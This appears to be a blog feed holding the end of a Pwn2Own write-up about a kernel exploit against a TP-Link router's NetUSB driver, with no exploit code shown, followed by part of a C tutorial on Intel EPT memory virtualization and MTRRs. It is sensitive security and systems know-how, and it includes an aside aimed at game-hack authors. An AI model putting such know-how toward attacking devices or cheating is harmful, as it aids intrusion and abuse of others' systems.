I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up.

At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again.
  • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
  • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
  • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hangout on Diary of reverse-engineering's Discord server with us!

MMU Virtualization via Intel EPT: Implementation – Part 1

31 January 2022 at 20:42

Overview

This article will cover the various requirements and features available for MMU virtualization via Intel Extended Page Tables. It’s going to be a relatively long article as I want to cover all of or most of the details concerning initialization and capability checking, MTRR setup, page splitting, and so on. We’ll start with checking feature availability and what capabilities are supported on the latest Intel processors, restructuring some of the VMM constructs to support EPT, and then move into the allocation of the page tables. This article will use the Windows memory management API to allocate and track resources. It’s highly recommended that the reader research and implement a custom memory allocator that doesn’t rely on the OS for resource allocation as these can be attack vectors for malicious third parties. However, we will be sticking to the most straightforward approach for simplicity. There is a lot of information to cover to avoid wasting much more time on this overview.

Disclaimer

Readers must have a foundational knowledge of virtual memory, paging, address translation, and page tables. This information is in §4.1.0 V-3A Intel SDM.

As always, the research and development of this project were performed on the latest Windows 10 Build 21343.1000. To ensure compatibility with all features, be aware that the author hosts an Intel i9-10850k (Comet Lake) that supports the most recent virtualization extensions. During capability/feature support checks, if your processor doesn’t show availability, do not worry — as long as it supports baseline EPT all is good.

Feature Availability

To start, we need to check a few things to make sure that we support EPT and different EPT policies. This project has a function that sets all VMX capabilities before launch, if available – checking for WB cache type, various processor controls, and related to this article – EPT, VPID, INVPCID support. These capabilities are inside the secondary processor controls, which we’ll read from the IA32_VMX_PROCBASED_CTLS2 MSR. The first 32 bits indicate the allowed 0 settings of these controls, and the upper 32 bits indicate the allowed one settings of this control. You should already have an algorithm set up to check and enable the various control features. If not, please refer back to this article in the first series on CPU virtualization.

Possible Incompatibility

If your processor doesn’t support secondary processor controls, you will be unable to implement EPT. The likelihood of this being an issue is slim unless you’re using a very old processor.

Once the capabilities and policies have been verified and enabled, we will enable EPT. However, there will be an information dump prior because it’s essential to understand extended paging as an extension of the existing paging mechanism and the structural changes to your hypervisor. We’ll need to allocate a data structure inside of our guest descriptor that will contain the EPTP. The design of your project will vary from mine, but the important thing is that each guest structure allocated has its EPTP – this will be a 64-bit physical address. Here is an example of my guest descriptor:

typedef struct gcpu_descriptor_t
{
    uint16_t                id;
    gcpu_handle_t           guest_list;
    crn_access_rights       cr0_ar;
    crn_access_rights       cr4_ar;
    uint64_t                eptp;

    //
    // ... irrelevant members ...
    //

    gcpu_descriptor_t*      next_gcpu;
} gcpu_descriptor_t;

Once you have an EPTP member setup, you’ll need to write the address of this member into the VMCS_EPTP_ADDRESS field using whatever VMCS write primitive you have set up. Similar to this:

// EPTP Address (Field Encoding: 0x201A)
//
vmwrite(vmcs, VMCS_EPTP_ADDRESS, gcpu->eptp);

Before implementing the main portion of the code for EPT, let’s address some important technical details. It’s in your best interest to read the following sections thoroughly to ensure you understand why certain things are checked and why certain conditions are unsupported. Improper virtualization of the MMU can cause loads of issues as you build your project out, so it’s imperative to understand how everything works before extending. It’s also good to review so that confusion is minimized in future sections… and because details are cool.

Memory Virtualization

Virtual memory and paging are necessary abstractions in today’s working environments. They enable the modern computer system to efficiently utilize physical memory, isolate processes and execution contexts, and pass off the most complex parts of memory management to the OS. Before diving into the implementation of EPT, the reader (you) must have a decent understanding of virtual memory and paging; and address translation. There was a brief overview of the address translation performed in the previous article. We’ll go into more detail here to set the stage for allocating and maintaining your EPT page hierarchies.

— Virtual Memory and Paging

In modern systems, when paging is enabled, every process has its own dedicated virtual address space managed at a specific granularity. This granularity usually is 4kB in size, and if you’ve ever heard the term page-aligned, then you’ve worked with paging mechanisms. Page-aligned buffers are buffers (like your VMCS) aligned on page boundary — since the system is divided into granular chunks called pages, then page-aligned means that the starting address of a buffer is at the beginning of a page. A simple way to verify if an address is aligned on a page boundary is to check that the lower 12-bits of the address are clear (or zero). However, this is only true for 4kB pages; pages with different granularity, such as 2MB, 4MB, or 1GB, will have different alignment masks. For example, take the address FFFFD288`BD600000. This address is 4kB page aligned (the lower 12-bits are clear), but it would not be aligned on a page boundary if the size of pages were 1GB. To check this, we would take this address to perform a logical AND operation against the 2s complement of the size (4kB, 1MB, 2MB, 4MB, 1GB) minus 1.

The macro might look something like this: PAGE_ALIGN_4KB(_ADDRESS)   ((UINTPTR)(_ADDRESS) & ~(0x1000 - 1)). Whereas for 1GB, the 0x1000 (4,096 in hex) would be replaced by 0x40000000 (the size of a 1GB page.) Give it a try yourself and look at the differences between the addresses when aligned on their respective granularity’s boundary.

 Page Alignment Trivia

On a 4kB page size architecture, there are several different instances of page-aligned addresses other than 4,096. Two of those are 12,288 (0x3000) and 413,696 (0x65000) — as you may notice, the lower 12-bits are all clear in these. You can use any multiple desired page granularity to determine if the page is appropriately aligned. The expression (FFFFD288`BD600000 & ~(0x32000-1)) still results in the same address; thus, this address is page-aligned – 0x32000 is a multiple of the page granularity.

So, how is this virtual memory managed and mapped to a physical page? The implementation details are specific to the OS that does the memory management; there is enough information for a whole book — luckily, a few well-written researchers have covered much of it in Windows Internals 7th Edition. The main thing to understand here is that all per-process mappings are stored in a page table which allows for virtual-to-physical address translation. In modern systems using virtual memory, for all load/store operations on a virtual address, the processor translates the virtual address to a physical address to access the data in memory. There are many different hardware facilities like the Translation Lookaside Buffer (TLB) that expedite this address translation by caching the most recently used (MRU) page table entries (PTEs). This allows the system to leverage paging in a performant manner since performing all the steps to address translation every time it’s accessed would significantly reduce performance, as with TLB misses. The previous article briefly covered the TLB and the various conditions that may be encountered. It may be worth reviewing since it’s been a bit since it was released…

  Overheads of Paging

As physical memory requirements grow, large workloads will experience higher latency due to paging on modern systems. This is in part to the size of the TLB not keeping pace with memory demands; this is partly due to the TLB being on the processor’s critical path for memory access. There are a few TLBs on systems, but most notably, the L1 and L2 TLB have begun to stagnate in size. You can read more about this problem, referred to as TLB reach limitation, in the recommended reading section if interested. There are also several papers on ResearchGate proposing solutions to increase TLB reach.

The reason for mentioning this is that how you design virtual memory managers is vital in preserving the many benefits of paging without tanking system performance. This is something to consider when adding an additional layer of address translation, such as in the case of EPT. So, what about the page table?

𝛿 Address Translation Visualized

As mentioned above, the page table is a per-process structure (or per-context) that contains all the virtual-to-physical mappings of a process. The OS manages it, and the hardware performs the page table walk; in some cases, the OS fetches the translation. You know that this mapping of virtual to physical addresses occurs at a page granularity specified. So let’s take a look at a diagram showing the process of translating a virtual address to a physical address and then walk through the process.

The above diagram features an abstract view that you’ve likely seen a few times throughout this series, but it’s essential to keep it fresh in mind when walking through the actual address translation process. To address the abstract layout, we start with CR3, which contains the physical base address of the current task’s topmost paging structure — in this case, the base of the PML4 table. The indexes in these different tables are determined by the linear address given for translation. A given PML4 entry (PML4E) will point to the base of a page directory pointer table (PDPT). At each step, the new physical address calculated is dereferenced to determine the base of the next paging structure. An offset into that table is added to the entries physical address, and so on — down the chain. Let’s walk through the process with a non-trivial linear address to get a more concrete example of this.

The linear address given is, and the CR3 was determined by reading the _KPROCESS structure and pulling the address out of the DirectoryTableBase member which was 13B7AA000. The first thing that must be done is to split the associated linear address into parts required for address translation. The numbers above each block are the bit ranges that comprise that index. Bits 39 to 47, for instance, are the bits that will be used to determine the offset into the PML4 table to find the corresponding PML4E. If you want to follow along or try it out for yourself, you can use SpeedCrunch or WinDbg (with the .format command) on the linear address and split it up accordingly. I’d say this is somewhat straightforward, but for the sake of giving as many examples as possible, the code below presents a few C macros that are useful for address translation.

#define X64_PML4E_ADDRESS_BITS          47
#define X64_PDPTE_ADDRESS_BITS          39
#define X64_PDTE_ADDRESS_BITS           30
#define X64_PTE_ADDRESS_BITS            21
        
#define PT_SHIFT                        12
#define PDT_SHIFT                       21
#define PDPT_SHIFT                      30
#define PML4_SHIFT                      39
        
#define ENTRY_SHIFT                     3

#define X64_PX_MASK(_ADDRESS_BITS)      ((((UINT64)1) << _ADDRESS_BITS) - 1)

#define Pml4Index(Va)                   (UINT64)((Va & (UINT64)(X64_PX_MASK(X64_PML4E_ADDRESS_BITS)) >> PML4_SHIFT))
#define PdptIndex(Va)                   (UINT64)((Va & (UINT64)(X64_PX_MASK(X64_PDPTE_ADDRESS_BITS)) >> PDPT_SHIFT))
#define PdtIndex(Va)                    (UINT64)((Va & (UINT64)(X64_PX_MASK(X64_PDTE_ADDRESS_BITS)) >> PDT_SHIFT))
#define PtIndex(Va)                     (UINT64)((Va & (UINT64)(X64_PX_MASK(X64_PTE_ADDRESS_BITS)) >> PT_SHIFT))

// Returns the physical address of PML4E mapping the provided virtual address.
//
#define GetPml4e(Cr3, Va)               ((PUINT64)(Cr3 + (Pml4Index(Va) << ENTRY_SHIFT)))

// Returns the physical address of the PDPTE which maps the provided virtual address.
//
#define GetPdpte(PdptAddress, Va)       ((PUINT64)(PdptAddress + (PdptIndex(Va) << ENTRY_SHIFT)))

// Returns the physical address of the PDTE which maps the provided virtual address.
//
#define GetPdte(PdtAddress, Va)         ((PUINT64)(PdtAddress + (PdtIndex(Va) << ENTRY_SHIFT)))

// Returns the physical address of the PTE which maps the provided virtual address.
//
#define GetPte(PtAddress, Va)           ((PUINT64)(PtAddress + (PtIndex(Va) << ENTRY_SHIFT)))

There’s a lot of shifting and masking in the above; it can be quite daunting to those unfamiliar. There’s only one way to detail the bit shifting shenanigans, and that’s done pretty well in the Intel SDM Vol. 3A Chapter 4. This will be in the recommended reading as understanding paging and virtual memory in depth are necessary. However, circling back to our earlier example, I’ll explain how these macros, in conjunction with a simple algorithm, can be used to traverse the paging hierarchy quickly and efficiently.

  Important Note

If you attempt to traverse the paging structures yourself, you will find that the entries inside of each page table look something akin to 0a000001`33c1a867. This is normal; this is the format for the PTE data structure. On Windows, this is the structure type _MMPTE. If you cast entry to this data structure, you’ll see that it has a union specified and allows you to look at the individual bits set inside the hardware page structure, among other types. For instance, the example given – 0a000001`33c1a867 – is valid, dirty, allows writes, and has a PFN of 133c1a. The information you want for address translation is the page frame number (PFN).

Given the note above, we have to do two simple bitwise operations to get the page frame number (PFN) from the page table entry to provide these macros at each step. The first thing is to mask off the upper word (16-bits) of the entry — this will leave the page frame number and the additional information such as the valid, dirty, owner, and accessed bits, which is what makes up the bottom portion (the 867).  In this case, using the entry value 0a000001`33c1a867, we would have to perform a bitwise AND against a mask that will retain the lower 48 bits (maximum address size when 4-level paging is used). A mask that would do this can be constructed by setting the uppermost bit position (48) and subtracting one, resulting in a mask with all the bits 48 and below set. The mask can be hard-coded or generated with this expression: ((1 << 48) - 1).

If we take our address and do the following:

u64 pdpe_address = ( 0x0a00000133c1a867 & ( ( 1 << 48 ) - 1 ) ) ... /* one more step necessary */

We would be left with the lower 48 bits yielding the result 133c1a867. All that’s left is to clear the lower 12 bits and then pass the result to the next step in our address translation sequence. The bottom 12 bits must be clear since the address of the next paging structure will always be page-aligned. This can be done by masking them off and completing the above expression to yield the next paging structures address:

u64 pdpe_address = ( 0x0a00000133c1a867 & ( ( 1 << 48 ) - 1 ) ) & ~0xFFF;

The above is the same as doing 133c1a867 & 0x000FFFFFFFFFF000, but we want the cleanest solution possible. After this, the variable the result is assigned to holds the value 133c1a000 which is our PDPE base address in this example. These steps can be macro’d out, but I wanted to illustrate the actual entries being processed by hand, so the logic became clear. As the below code excerpt demonstrates, the macros provided before this example are intended to be used.

// This is a brief example, not production ready code...
//
u64 DirectoryBase = 0x1b864d000;
u64 Va = 0x760715d000;

u64 Pml4e = GetPml4e( DirectoryBase, Va );

u64 PdptBase = ( *Pml4e & X64_VIRTUAL_ADDRESS_BITS ) & ~0xFFF;
u64 Pdpte = GetPdpte( PdptBase, Va );

u64 PdtBase = ( *Pdpte & X64_VIRTUAL_ADDRESS_BITS ) & ~0xFFF;
u64 Pde = GetPdte( PdtBase, Va );

/* ... etc ... */

Ideally, you would loop and decrement the level based on various conditions and utilize the requirement that 9 bits be subtracted each time from whichever mask and check for certain bits and extensions in CR0 and CR4, among other things. We will cover a proper page walk in a later section of this article. This was intended to give a quick and dirty overview of the address translation process without checking for presence, large pages, access rights, etc. As of now, hopefully, you have a decent idea of how virtual memory and address translation work. This next section will dive into the info about SLAT mechanisms, in this case – the Extended Page Tables (EPT) feature on Intel processors.

— Extended Page Tables

Intel and other hardware manufacturers introduced virtualization extensions to allow multiple operating systems to execute on a single hardware setup. To perform better than the software virtualization solutions, many different facilities were introduced – one of them was EPT. This extension allows the host computer to fully virtualize memory thought it introduces a level of indirection between guest virtual address space (the VM virtual address space; GVA) and the host physical address space (HPA) called the guest physical address space (GPA). The addition of this second-level in the address translation process is where the acronym SLAT is derived from and also modifies the process taken. The procedure formerly was VA PA, but with SLAT enabled, becomes GVA GPA HPA. Guest virtual address to guest physical address translation is done through an additional per-process guest page table, and the guest physical address to host physical address translation is performed through the per-VM host page table.

 

Figure 2. Guest Virtual Address to Host Physical Address

This method of memory virtualization is commonly referred to as hardware-assisted nested paging. It is accomplished by allowing the processor to hold two-page table pointers: one pointing to the guest page table and another to the host page table. As mentioned earlier, we know that address translation can negatively impact system performance if the TLB misses are high. You can imagine this would by double-so with nested paging enabled it multiplies overheads 6-fold when a TLB miss occurs since it requires a 2-dimensional page walk. I write 2-dimensional because native page-walks only require one dimension of the page hierarchy being traversed, whereas with extended paging, there are two dimensions because of the two-page tables needing to be traversed. Natively, memory references that cause a TLB miss require 4 accesses to complete translation whereas when virtualized it increases to a whopping 24 accesses. This is where MMU caches and intermediate translations can improve the performance of memory accesses that result in a TLB miss – even when virtualized.

Anyways, enough of that, there will be some resources following the conclusion for those interested in reading about the page-walk caches and nested TLBs. I know you’re itching to initialize the EPT data for your project… so let’s get it goin’.

— EPT and Paging Data Structures

If you recall in the first series for virtualization we had a single function that initialized the VMXON, VMCS, and other associated data structures. Prior to enabling VMX operation, but after allocating the regions for our VMXON and VMCS as well as any other host-associated structures, we’re going to initialize our EPT resources. This will be done in the same function that runs for each virtual CPU. First and foremost, we need to check that the processor supports the features necessary for EPT. Depending on the structure of your project, I do it when checking the various VM-entry/VM-exit/VM-control structures for what bits are supported. Below are the data structure, function, and required references for checking if EPT features are available.

// EPT VPID Capability MSR Address
//
#define     IA32_VMX_EPT_VPID_CAP_MSR_ADDRESS                                   0x048C

// EPT VPID Capability MSR Bit Masks
//
#define     IA32_VMX_EPT_VPID_CAP_MSR_EXECUTE_ONLY                              (UINT64)(0x0000000000000001)
#define     IA32_VMX_EPT_VPID_CAP_MSR_PAGE_WALK_LENGTH_4                        (UINT64)(0x0000000000000040)
#define     IA32_VMX_EPT_VPID_CAP_MSR_UC_MEMORY_TYPE                            (UINT64)(0x0000000000000100)
#define     IA32_VMX_EPT_VPID_CAP_MSR_WB_MEMORY_TYPE                            (UINT64)(0x0000000000004000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_PDE_2MB_PAGES                             (UINT64)(0x0000000000010000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_PDPTE_1GB_PAGES                           (UINT64)(0x0000000000020000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_INVEPT_SUPPORTED                          (UINT64)(0x0000000000100000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_ACCESSED_DIRTY_FLAG                       (UINT64)(0x0000000000200000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_EPT_VIOLATION_ADVANCED_EXIT_INFO          (UINT64)(0x0000000000400000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SUPERVISOR_SHADOW_STACK_CONTROL           (UINT64)(0x0000000000800000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SINGLE_CONTEXT_INVEPT                     (UINT64)(0x0000000002000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_ALL_CONTEXT_INVEPT                        (UINT64)(0x0000000004000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_INVVPID                                   (UINT64)(0x0000000100000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_INDIVIDUAL_ADDRESS_INVVPID                (UINT64)(0x0000010000000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SINGLE_CONTEXT_INVVPID                    (UINT64)(0x0000020000000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_ALL_CONTEXT_INVVPID                       (UINT64)(0x0000040000000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SINGLE_CONTEXT_GLOBAL_INVVPID             (UINT64)(0x0000080000000000)

typedef struct _msr_vmx_ept_vpid_cap
{
    u64 value;
    union
    {
        // RWX support
        //
        u64 ept_xo_support : 1;
        u64 ept_wo_support : 1;
        u64 ept_wxo_support : 1;
        
        // Guest address width support
        //
        u64 gaw_21 : 1;
        u64 gaw_30 : 1;
        u64 gaw_39 : 1;
        u64 gaw_48 : 1;
        u64 gaw_57 : 1;
        
        // Memory type support
        u64 uc_memory_type : 1;
        u64 wc_memory_type : 1;
        u64 rsvd0 : 2;
        u64 wt_memory_type : 1;
        u64 wp_memory_type : 1;
        u64 wb_memory_type : 1;
        u64 rsvd1 : 1;
        
        // Page size support
        u64 pde_2mb_pages : 1;
        u64 pdpte_1gb_pages : 1;
        u64 pxe_512gb_page : 1;
        u64 pxe_1tb_page : 1;
        
        // INVEPT support
        u64 invept_supported : 1;
        u64 ept_accessed_dirty_flags : 1;
        u64 ept_violation_advanced_information : 1;
        u64 supervisor_shadow_stack_control : 1;
        u64 individual_address_invept : 1;
        u64 single_context_invept : 1;
        u64 all_context_invept : 1;
        u64 rsvd2 : 5;
        
        // INVVPID support
        u64 invvpid_supported : 1;
        u64 rsvd7 : 7;
        u64 individual_address_invvpid : 1;
        u64 single_context_invvpid : 1;
        u64 all_context_invvpid : 1;
        u64 single_context_global_invvpid : 1;
        u64 rsvd8 : 20;
    } bits;
} msr_vmx_ept_vpid_cap;

boolean_t is_ept_available( void )
{
    msr_vmx_ept_vpid_cap cap_msr;
    cap_msr.value = __readmsr(IA32_VMX_EPT_VPID_CAP_MSR_ADDRESS);
    
    if( !cap_msr.bits.ept_xo_support             ||
        !cap_msr.bits.gaw_48                     ||
        !cap_msr.bits.wb_memory_type             ||
        !cap_msr.bits.pde_2mb_pages              ||
        !cap_msr.bits.pdpte_1gb_pages            ||
        !cap_msr.bits.invept_supported           ||
        !cap_msr.bits.single_context_invept      ||
        !cap_msr.bits.all_context_invept         ||
        !cap_msr.bits.invvpid_supported          ||
        !cap_msr.bits.individual_address_invvpid ||
        !cap_msr.bits.single_context_invvpid     ||
        !cap_msr.bits.all_context_invvpid        ||
        !cap_msr.bits.single_context_global_invvpid )
    {
        return FALSE;
    }
    
    return TRUE;
}

The above code is intended to be placed into your project based on your layout. I included the macros for the bitmasks in case using the structure to represent the MSR was not as clean as desired. This function is_ept_available is intended to be called prior to setting the processor controls in the primary and secondary controls. Though we won’t get into handling CR3 load exiting in this article, the two controls of interest, for now, is enable_vpid and enable_ept in the secondary processor controls field. You should switch based on the result of the previous function. If all is well, the processor supports the required features (which can be adjusted at your discretion), we’ll need to set up the EPT data structures. However, before we do that we have to take a little detour to explain the use of VPIDs.

— Virtual Processor Identifiers and Process-Context Identifiers

Back in 2008, Intel decided to add a new cache hierarchy alongside some very important changes to the TLB hierarchy to cache virtual-to-physical address mappings. There were more involved changes, but what is relevant for our purposes is that the Intel Nehalem microarchitecture introduced the virtual processor identifier (VPID). As we know from the previous article, the TLB caches virtual-to-physical address translations for pages. The mapping cached in the TLB is specific to a task and guest (VM). On older processors, the TLB would be flushed incessantly as the processor switched between the VM and VMM, which had a massive impact on performance. The VPID is intended to track which guest a given translation entry in the TLB is associated with, providing the ability for the hardware to selectively invalidate caches on VM-exit and VM-entry, removing the requirement of flushing of the TLB for coherence and isolation.

For example, a process attempts to access a translation that it isn’t associated with — this results in a TLB miss rather than an access violation when walking through the page tables. VPIDs were introduced to improve the performance of VM transitions. Coupled with EPT, which further reduced VM transition overhead (because the VMM no longer had to service the #PF itself), you begin to see a reduction in VM exits and a significant improvement in virtualization performance. This feature brought with it new instructions to allow software the ability to invalidate mappings from the TLB associated with a VPID; the instruction is documented as invvpid; similarly, EPT introduced invept instruction which allows the software to invalidate cached information from the EPT page structures. To review some other technical details, please refer to the previous article.

Alongside the VPID technology, a hardware feature known as the process-context identifier (PCID) was introduced. PCIDs enable the hardware to “cache information for multiple linear-address spaces.” This means a processor can maintain cached data when software switches to a different address space with a different PCID. This was added at the same time in order to mitigate the performance impacts of TLB flushes due to context switching, and in a similar fashion to VPIDs, the instruction invpcid was added so that software may invalidate cached mappings in the TLBs associated with a specific PCID.

The main takeaway is that these features allow the software to skip flushing of the TLB when performing a context switch. This is because TLB flushing occurs on VM-entry and VM-exit due to address space change (aka the reload of CR3.) VPIDs support retention of TLB entries across VM switches and provide a performance improvement. Prior to this hardware feature being introduced the TLB used to map linear address physical adress, but utilizing VPID the TLB maps {VPID, linear address} physical address. Host software runs with VPID of 0, and the Guest will have a non-zero VPID assigned by the VMM. Note that some VMM implementations run on modern hardware will have the guest with a VPID of 0, this indicates that a TLB flush will occur on VM-entry and VM-exit.

  Regarding PCID and VPID

As noted in the Intel SDM, software can use PCIDs and VPIDs concurrently; for this project, we will not concern ourselves with the use of PCIDs. If you would like to tinker with this you can find details on how to enable PCIDs in §4.10.1 Vol. 3A of the Intel SDM.

For now, this is all that’s necessary to keep in the back of your mind. This next part is going to be pretty excerpt-heavy with descriptions and reasoning for collecting the information. Let’s get on to MTRRs, and then we’ll finally be ready to setup our EPT context.

— MTRRs

Memory type range registers (MTRRs) were briefly discussed in the first article of this series. In the simplest sense, these registers are used to associate memory caching types with physical-address ranges in system memory. They’re initialized by the BIOS (usually) and are intended to optimize accesses for a variety of memory. RAM, ROM, frame-buffer, MMIO, SMRAM, etc. These memory type registers are available for use through a series of model-specific registers which define the type of memory for a given range of physical memory. There are a handful of memory types, and if you’re familiar with the general theory of caching you’ll recall that there are 3 different levels of caches the processor may use for memory operations. The memory type specified for a region of system memory influences whether these locations are cached or not, and their memory ordering model. In this subsection, whenever you see memory type or cache type they’re referring to the same thing. We’re going to address those memory types below.

PAT preference over MTRR

This section is optional* and a moderate overview of how the BIOS/UEFI firmware sets up MTRRs during boot, therefore this section is optional unless you’re interested in how the BIOS/firmware determines memory types and updates the various MTRRs. It’s recommended that system developers use the Page Attribute Table (PAT) over the MTRRs. Feel free to skip over this to the EPT hierarchies section.

𝛿 Strong Uncacheable (UC)

Any system memory marked as UC indicates that it isn’t cached. Every load and store to that region will be passed through the memory access path and executed in order, without any reordering. This means that there aren’t speculative memory accesses, page-table walks, or any sort of branch prediction. The memory controller performs the operation on DRAM of the default size (64-bytes is typical minimum read size), but returns the requested data to the processor and the information is not propagated to any cache. Since having to access main memory (DRAM) is slow, using this memory type frivolously can significantly reduce performance of the system. It typically will be used for MMIO device ranges, and the BIOS region. The memory model for this memory type is referred to as strongly ordered.

𝛿 Uncacheable (UC- or UC Minus)

This memory type has the same properties as the UC type although it can be overridden by WC if the MTRRs are updated. It’s also only able to be selected through the use of the page attribute table (PAT), which we will discuss following this section.

𝛿 Write Combine (WC)

This memory type is primarily used with any sort of GPU memory, frame buffer, etc. This is because the order of writes aren’t important to the display of whatever data. It operates similar to UC in that the memory locations aren’t cached and coherency isn’t enforced. For instance, if you were to use some GPU API to map a buffer or texture into memory you can bet that memory will be marked as write combine (WC). An interesting behavior is what happens when a read is performed. The read operation is treated as if it were performed on an uncached location. All write-combined buffers get flushed to main memory (oof) and then the read is completed without any cache references. This means that reads on WC memory will impact performance if done often, much like with UC (because they behave as if the memory was UC).

There’s not really a great reason to read from WC memory, and reading back-buffers, or some constant buffer is usually advised against for this reason. If you want to perform a write to WC memory, well, you need to make sure your compiler doesn’t try to reorder writes (hint: volatile). You also don’t want to be performing writes to individual memory locations with WC memory – if you’re writing to a WC range, you’re going to want to write the whole range. It’s better to have one large write than a bunch of small writes — less of a performance impact when modifying WC memory. Alignment, access width, and other rules may be in place – so whether Intel or AMD, check your manual.

(For those reading that like to make game hacks and have issues with the perf of your “hardware ESP”, maybe this will jog your brain.)

𝛿 Write Through (WT)

With this cache type memory operations are cached. Reads will come from caches on a cache hit, misses will cause cache fills. You can see an explanation of read + fill in the previous article. The biggest thing to note about the write through (WT) type is that writes are propagated to a cache line and also written through to memory. This type enforces coherency between caches and main memory.

𝛿 Write Back (WB)

This is the most common memory type throughout the ranges on your machine, as it is the most performant. Memory operations are cached, speculative operations are allowed, however, writes to a cache line are not forwarded to system memory; they’re propagated to the cache and the modified cache lines are written back to main memory when a write-back operation occurs. It enforces memory and cache coherency, and requires devices that may access memory on the system bus to be able to snoop memory accesses. This allows low latency and high throughput for write-intensive tasks.

  Bus Snooping

The term bus snooping used to mean a device was sniffing the bus (monitoring bus transactions) to be aware of changes that may have occurred when requesting a cache line. In modern systems, it’s a bit different. If you’re interested in how cache coherency is maintained on modern systems you can look at the recommended reading section, and/or the patents under the cache coherency classification here. Additionally, the Intel Patent linked here.

𝛿 Write Protected (WP)

This caching type simply propagates writes to the interconnect (shared bus) and causes relevant cache lines on all processors to be invalidated. Whereas reads fetch data from cache lines when available. This memory type is usually intended to cache ROM without having to reach out to the ROM itself.

Now that we’ve discussed the different memory types available to the system programmer, let’s implement our MTRR API so we can appropriately set our memory types when we begin allocating memory for EPT.

— MTRR Implementation

With MTRRs, whether programming them or accessing for information, we’re going to be using a number of model-specific registers (MSRs) that Intel documents. The main two of interest will be the IA32_MTRR_CAP_MSR and IA32_MTRR_DEF_TYPE_MSR. The MTRR capabilities MSR (IA32_MTRR_CAP_MSR) is used to gather additional information about MTRRs such as the number of variable range MTRRs are implemented by the hardware, fixed range MTRRs, and whether write-combining is supported. There are some other flags, but they aren’t of interest to us for this article. The structure for this MSR is given below.

typedef union _ia32_mtrrcap_msr
{
    u64 value;
    struct
    {
        u64 vcnt : 8;
        u64 fr_mtrr : 1;
        u64 rsvd0 : 1;
        u64 wc : 1;
        u64 smrr : 1;
        u64 prmrr : 1;
        u64 rsvd1 : 51;
    } bits;
} ia32_mtrrcap_msr;

The MTRR default type MSR (IA32_MTRR_DEF_TYPE_MSR) provides the default cache properties of physical memory that is not covered by the MTRRS. It also allows the software programming the MTRRs to determine whether MTRRs and the associated fixed-ranges are enabled. Here is the structure I use.

typedef union _ia32_mtrr_def_type_msr
{
    u64 value;
    struct
    {
        u64 type : 8;
        u64 rsvd0 : 2;
        u64 fe : 1;
        u64 en : 1;
        u64 rsvd1 : 51;
    } bits;
} ia32_mtrr_def_type_msr;

MTRRs come in two flavors, fixed and variable range. On Intel, there are 11 fixed-range registers each divided into 8 bit-fields and are used to determine/specify the memory type for each sub-range it covers. The table below depicts how each fixed-range MTRR is divided to cover their respective address ranges.

Figure 4. Bit-field layout for fixed-range MTRRs

Knowing the mapping for each of these type range registers allows us to develop an algorithm to determine which fixed-range an address falls under, if at all. How we’ll achieve this is by defining a few base points to compare the address against. As you can see the first MTRR is named IA32_MTRR_FIX64K_00000 and based on the address ranges covered by the bit-field it maps 512 KiB from 00000h to 7FFFFh, and it has eight 64 KiB sub-ranges in the bitfield (see above table). The IA32_MTRR_FIX16K_80000 and IA32_MTRR_FIX16K_A0000 MTRRs map two 128 KiB address ranges from 80000h to BFFFFh. Then there are eight 32KiB ranges covered by the FIX4K MTRRs. These 4K MTRRs cover 256 KiB through 8 fixed-range registers.

 MTRR Ranges

